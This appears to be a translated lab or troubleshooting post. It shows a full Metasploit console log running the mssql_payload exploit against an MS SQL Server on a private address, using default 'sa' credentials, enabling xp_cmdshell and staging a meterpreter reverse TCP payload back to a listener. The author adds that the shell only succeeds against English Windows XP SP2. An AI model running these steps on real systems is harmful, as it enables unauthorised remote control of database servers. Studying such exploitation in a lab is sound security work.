Exploit completed, but no session was created.

Geeks, please accept the hero post of 2021 Microsoft x Intel hacking contest>>>

The steps are as follows: 1

msf5 exploit(windows/mssql/mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD             sa               no        The password for the specified username
   RHOSTS               192.168.0.20     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433             yes       The target port (TCP)
   SRVHOST              0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT              8080             yes       The local port to listen on.
   SSL                  false            no        Negotiate SSL for incoming connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.22     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/mssql/mssql_payload) > exploit

[*] Started reverse TCP handler on 192.168.0.22:4444 
[*] 192.168.0.20:1433 - The server may have xp_cmdshell disabled, trying to enable it...
[*] 192.168.0.20:1433 - Command Stager progress -   1.47% done (1499/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -   2.93% done (2998/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -   4.40% done (4497/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -   5.86% done (5996/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -   7.33% done (7495/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -   8.80% done (8994/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  10.26% done (10493/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  11.73% done (11992/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  13.19% done (13491/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  14.66% done (14990/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  16.13% done (16489/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  17.59% done (17988/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  19.06% done (19487/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  20.53% done (20986/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  21.99% done (22485/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  23.46% done (23984/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  24.92% done (25483/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  26.39% done (26982/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  27.86% done (28481/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  29.32% done (29980/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  30.79% done (31479/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  32.25% done (32978/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  33.72% done (34477/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  35.19% done (35976/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  36.65% done (37475/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  38.12% done (38974/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  39.58% done (40473/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  41.05% done (41972/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  42.52% done (43471/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  43.98% done (44970/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  45.45% done (46469/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  46.91% done (47968/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  48.38% done (49467/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  49.85% done (50966/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  51.31% done (52465/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  52.78% done (53964/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  54.24% done (55463/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  55.71% done (56962/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  57.18% done (58461/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  58.64% done (59960/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  60.11% done (61459/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  61.58% done (62958/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  63.04% done (64457/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  64.51% done (65956/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  65.97% done (67455/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  67.44% done (68954/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  68.91% done (70453/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  70.37% done (71952/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  71.84% done (73451/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  73.30% done (74950/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  74.77% done (76449/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  76.24% done (77948/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  77.70% done (79447/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  79.17% done (80946/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  80.63% done (82445/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  82.10% done (83944/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  83.57% done (85443/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  85.03% done (86942/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  86.50% done (88441/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  87.96% done (89940/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  89.43% done (91439/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  90.90% done (92938/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  92.36% done (94437/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  93.83% done (95936/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  95.29% done (97435/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  96.76% done (98934/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  98.19% done (100400/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress -  99.59% done (101827/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
msf5 exploit(windows/mssql/mssql_payload) >

What’s disturbing is the last sentence

Expand completed, but no session was created.

after three axes, I couldn’t return to the shell. I tried many ways to change the target’s operating system and Metasploit version. No matter how hard I tried, I finally found the answer from the book. The target should use the English version of Windows XP SP2, We should say “English version”, “English version” and “English version” three times about important things
after the replacement, it returned to the shell successfully. As for other systems, especially the Chinese version, I don’t know what to do

Similar Posts: